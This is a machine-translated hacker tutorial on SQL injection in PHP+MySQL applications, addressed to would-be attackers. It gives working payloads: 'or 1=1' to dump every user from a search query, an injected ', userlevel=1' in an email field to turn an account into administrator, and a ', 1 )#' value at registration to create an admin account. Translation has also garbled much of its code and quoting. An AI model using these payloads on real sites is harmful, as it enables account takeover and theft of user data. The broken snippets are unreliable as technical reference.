Php + Mysql injection topic

Author: alpha from: http://www.cnwill.com/

Php injection attacks are currently the most popular attack methods, and their powerful flexibility attracts many black fans.

Lin. linx focuses on various php program vulnerabilities and php + mysql injection. However, there are few injection problems, which makes us feel like we are not doing our best.
OK. In this phase, I will blow php + mysql injection to the big guy. It will surely let you get it all done (who threw a brick !).
This article mainly serves the dishes. If you are an old bird, some things may be boring, but as long as you read it carefully, you will find a lot of interesting things.

To read this article, you only need to understand the following.

1. understand how the php + mysql environment is built. We will include relevant articles on the CD. If you are not clear about how to build the php + mysql environment, please refer to this article first, this topic was also introduced in the previous issue.
2. Understand the configuration of php and apache, mainly using php. ini and httpd. conf.
In this article, we mainly use the configuration of php. ini. For the sake of security, we usually open php. the security mode in ini, that is, making safe_mode = On, and returning display_errors with php Execution errors will return a lot of useful information, so we should disable it,
That is, after display_errors = off is disabled, the php function execution error information will not be displayed to the user.
In the php configuration file php. ini, magic_quotes_gpc is an important configuration option. By default, magic_quotes_gpc = On is used in the later version, and only
The default configuration is magic_quotes_gpc = Off, but some antique items are also used!
What will happen when magic_quotes_gpc = On is in php. ini? Don't worry. The sky will not collapse! It only converts all the (single quotation marks), (double quotation marks), (backslash), and null characters in the submitted variables into escape characters containing the backslash, for example, changed \.
This makes us very uncomfortable. Many times we have to say BYEBYE to the character type,
But don't be discouraged. We still have a good way to deal with it. Let's look down!
3. Have a certain php language foundation and understand some SQL statements. These are very simple. We use very few things, so the charge is still coming!

Let's take a look at what we can do when magic_quotes_gpc = Off, and then we can find a way to solve the problem of magic_quotes_gpc = On.

I. injection attack when magic_quotes_gpc = Off
Although magic_quotes_gpc = Off is not safe, the new version also makes
Magic_quotes_gpc = On, but we also find magic_quotes_gpc = Off On many servers, such as www. qichi .*.
Some other programs, such as the vbb Forum, even if you configure magic_quotes_gpc = On, it will automatically eliminate escape characters so that we can take advantage of them.
Magic_quotes_gpc = Off injection methods are still available in large markets.

Next we will explain in detail mysql + php injection in terms of syntax, injection points and injection types.

A: starting with MYSQL syntax
1. First, let's talk about some basic mysql syntaxes. It's a supplementary lesson for children who haven't learned well ~ _~
1) select
SELECT [STRAIGHT_JOIN] [SQL _SMALL_RESULT]
Select_expression ,...
[INTO {OUTFILE | DUMPFILE} file_name export_options]
[FROM table_references
[WHERE where_definition]
[Group by col_name,...]
[Order by {unsigned_integer | col_name | formula} [ASC | DESC],...]
]
These are commonly used. select_expression refers to the column to be retrieved. We can use where to limit the conditions, or we can use into outfile to output the select result to the file. Of course, we can also use select to directly output
For example

Mysql> select;
+ --- +
| A |
+ --- +
| A |
+ --- +
1 row in set (0.00 sec)
For details, see mysql Chinese Manual section 7.12.
The following describes some exploitation.
View code first
This code is used for searching.

 

 

.........
SELECT * FROM users WHERE username LIKE '% $ search % order by username
.......
?>

Here, by the way, % is a wildcard in mysql. Other wildcards include * and _. "*" is used to match the field name, and "%" is used to match the field value, note that % must be used with like, and there is also a wildcard, which is the underscore "_", which represents a different meaning than above and is used to match any single character. In the above Code, we used * to indicate the names of all returned fields, and % $ search % to indicate all content containing the $ search character.

How do we inject miles?
Haha, similar to asp
Submit in Form
Aabb % or 1 = 1 order by id #
Note: # It indicates the meaning of the comment in mysql, that is, the subsequent SQL statement is not executed, which will be discussed later.
Someone may ask why or 1 = 1 is used,

Import submitted content into SQL statements to become

SELECT * FROM users WHERE username LIKE '% aabb % or 1 = 1 order by id # order by username

If there is no user name containing aabb, or 1 = 1 causes the return value to be true, so that all values can be returned.

We can also do this.

Submit in Form
% Order by id #
Or
Order by id #
Entered into SQL statements
SELECT * FROM users WHERE username LIKE '% order by id # order by username
And
SELECT * FROM users WHERE username LIKE '% order by id # order by username
Of course, all content is returned.
Listing all the users, maybe even the password.
Here is an example. A more subtle select statement will appear below. select is actually almost everywhere!
2) Let's take a look at update.
Mysql Chinese manual explains this:
UPDATE [LOW_PRIORITY] tbl_name SET col_name1 = expr1, col_name2 = expr2 ,...
[WHERE where_definition]
UPDATE updates the columns in the row of an existing table with the new value. The SET clause specifies the column to be modified and the value they should be given. If so, it specifies the row to be updated, otherwise, all rows are updated.
For more information, see mysql Chinese Manual section 7.17. Here we will introduce it in detail.
We can see from the above that update is mainly used for data updates, such as Article modification and user data modification. We seem to be more concerned with the latter because ......
Check the code first.
Let's first give the table structure so that you can understand it.
Create table users (
Id int (10) not null auto_increment,
Login varchar (25 ),
Password varchar (25 ),
Email varchar (30 ),
Userlevel tinyint,
Primary key (id)
)
Userlevel indicates the level. 1 is the administrator and 2 is a common user.
// Change. php
......
$ SQL = "UPDATE users SET password = $ pass, email = $ email WHERE id = $ id"
......
?>
Okay, we started injecting it. We added it to the e-mail address.
Netsh@163.com, userlevel = 1
The SQL statement is
UPDATE users SET password = youpass,
Email = netsh@163.com, userlevel = 1 WHERE id = youid
Let's see if our userlevel is 1 and it becomes administrator.
Haha, it's so cool that it's essential for home travel.
Here we will briefly mention the single quotation mark closure problem. If only one single quotation mark is used, but no single quotation mark is used to form a pair, the system will return an error. Column types are mainly divided into numeric, date, time, and string types. However, quotation marks are generally used in string types, but generally do not use quotation marks (however, they can be used, and the power is huge.) Date and Time types are rarely used for injection (because there are very few time variables to be submitted ). Below we will detail these injection methods!

3) It's the next turn to insert. It's just like the students in the midday canteen.
The Php Chinese manual teaches us this way:
INSERT [LOW_PRIORITY | DELAYED] [IGNORE]
[INTO] tbl_name [(col_name,...)]
VALUES (expression ,...),(...),...
INSERT inserts a new row into an existing table. INSERT... the statements in the form of values insert rows based on explicitly specified VALUES, INSERT... INSERT rows selected from other tables in the SELECT form. INSERT into tables with multiple values... the VALUES format is supported in MySQL 3.22.5 or later versions, and the col_name = expression syntax is supported in MySQL 3.22.10 or later versions.
It can be seen that, if we do not see the background, insert mainly appears at the registration place, or where there are other submissions.

Look at the table structure first
Create table membres (
Id varchar (15) not null default,
Login varchar (25 ),
Password varchar (25 ),
Email varchar (30 ),
Userlevel tinyint,
Primary key (id)
)
We still assume that userlevel indicates the user level. 1 indicates the Administrator level and 2 indicates the common user level.
The Code is as follows:
// Reg. php
......
$ Query = "insert into members VALUES ($ id, $ login, $ pass, $ email, 2 )";
......
?>
The default inserted user level is 2.
Now we have built the injection statement.
Enter the email address as follows:
Netsh@163.com, 1 )#
SQL statement execution becomes:
Insert into membres VALUES (youid, youname, youpass, netsh@163.com, 1 )#,?)
We registered as the administrator.
# What does it mean? Don't forget it, dizzy. So fast?
Forget it. Let's talk about it in detail.

2. Let's talk about the comment in mysql. This is very important. You can't go to bed any more. If you go to bed until the end of the exam, you will get down.